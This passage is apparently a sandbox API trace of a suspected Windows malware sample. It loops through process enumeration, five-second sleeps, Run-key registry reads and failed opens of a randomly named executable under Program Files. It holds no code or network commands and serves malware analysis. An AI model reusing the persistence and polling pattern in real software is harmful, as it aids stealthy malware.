(HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0290.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0290.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0290.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0290.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0290.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0290.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0290.732] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0290.734] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0290.735] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0290.735] NtClose (Handle=0x338) returned 0x0 [0290.735] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.735] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.736] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de220) returned 1 [0290.736] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.736] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.736] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0290.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0290.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0290.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0290.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0290.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0290.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0290.915] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0290.918] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0290.919] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0290.919] NtClose (Handle=0x338) returned 0x0 [0290.919] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.919] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.919] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0290.919] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.919] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.920] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dec20) returned 1 [0290.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0290.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0290.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0290.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0290.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0291.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0291.081] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0291.083] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0291.085] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0291.085] NtClose (Handle=0x338) returned 0x0 [0291.085] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.085] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.085] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0291.085] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.085] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.085] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0291.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0291.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0291.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0291.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0291.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0291.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0291.234] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0291.236] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0291.237] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0291.237] NtClose (Handle=0x338) returned 0x0 [0291.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.237] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.238] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0291.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.238] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.238] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0291.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0291.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0291.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0291.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0291.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0291.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0291.373] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0291.374] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0291.374] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0291.375] NtClose (Handle=0x338) returned 0x0 [0291.375] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.375] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.375] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0291.375] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.375] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.375] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de1a0) returned 1 [0291.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0291.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0291.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0291.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0291.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0291.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0291.505] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0291.507] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0291.509] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0291.509] NtClose (Handle=0x338) returned 0x0 [0291.509] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.509] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.509] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de420) returned 1 [0291.509] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.510] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.510] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0291.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0291.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0291.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0291.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0291.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0291.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0291.656] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0291.658] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0291.660] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0291.660] NtClose (Handle=0x338) returned 0x0 [0291.660] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files 